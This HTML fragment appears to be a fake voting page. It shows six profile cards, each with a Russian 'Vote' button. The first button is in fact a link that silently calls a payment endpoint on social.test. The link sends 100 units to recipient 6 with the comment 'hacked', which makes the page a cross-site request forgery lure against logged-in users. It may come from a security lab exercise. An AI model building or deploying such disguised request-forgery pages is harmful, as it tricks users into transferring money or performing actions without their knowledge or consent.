<div class="row">
  <div class="col-md-6">
    <div class="card mb-3">
      <div class="row g-0">
        <div class="col-md-4">
          <img src="https://i.pravatar.cc/200?u=user1" alt="User 1" class="img-fluid">
        </div>
        <div class="col-md-8">
          <div class="card-body">
            <h5 class="card-title">Имя: User 1</h5>
            <p class="card-text">Возраст: 30</p>

            <a class="btn btn-primary" href="https://social.test/payments/create_payment?payment[recipient_id]=6&payment[amount]=100&payment[comment]=hacked">Голосовать</a>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="col-md-6">
    <div class="card mb-3">
      <div class="row g-0">
        <div class="col-md-4">
          <img src="https://i.pravatar.cc/200?u=user2" alt="User 2" class="img-fluid">
        </div>
        <div class="col-md-8">
          <div class="card-body">
            <h5 class="card-title">Имя: User 2</h5>
            <p class="card-text">Возраст: 25</p>
            <button type="button" class="btn btn-primary">Голосовать</button>
          </div>
        </div>
      </div>
    </div>
  </div>
  
  <div class="col-md-6">
    <div class="card mb-3">
      <div class="row g-0">
        <div class="col-md-4">
          <img src="https://i.pravatar.cc/200?u=user3" alt="User 3" class="img-fluid">
        </div>
        <div class="col-md-8">
          <div class="card-body">
            <h5 class="card-title">Имя: User 3</h5>
            <p class="card-text">Возраст: 35</p>
            <button type="button" class="btn btn-primary">Голосовать</button>
          </div>
        </div>
      </div>
    </div>
  </div>
  
  <div class="col-md-6">
    <div class="card mb-3">
      <div class="row g-0">
        <div class="col-md-4">
          <img src="https://i.pravatar.cc/200?u=user4" alt="User 4" class="img-fluid">
        </div>
        <div class="col-md-8">
          <div class="card-body">
            <h5 class="card-title">Имя: User 4</h5>
            <p class="card-text">Возраст: 28</p>
            <button type="button" class="btn btn-primary">Голосовать</button>
          </div>
        </div>
      </div>
    </div>
  </div>
  
  <div class="col-md-6">
    <div class="card mb-3">
      <div class="row g-0">
        <div class="col-md-4">
          <img src="https://i.pravatar.cc/200?u=user5" alt="User 5" class="img-fluid">
        </div>
        <div class="col-md-8">
          <div class="card-body">
            <h5 class="card-title">Имя: User 5</h5>
            <p class="card-text">Возраст: 32</p>
            <button type="button" class="btn btn-primary">Голосовать</button>
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="col-md-6">
    <div class="card mb-3">
      <div class="row g-0">
        <div class="col-md-4">
          <img src="https://i.pravatar.cc/200?u=user6" alt="User 5" class="img-fluid">
        </div>
        <div class="col-md-8">
          <div class="card-body">
            <h5 class="card-title">Имя: User 6</h5>
            <p class="card-text">Возраст: 32</p>
            <button type="button" class="btn btn-primary">Голосовать</button>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
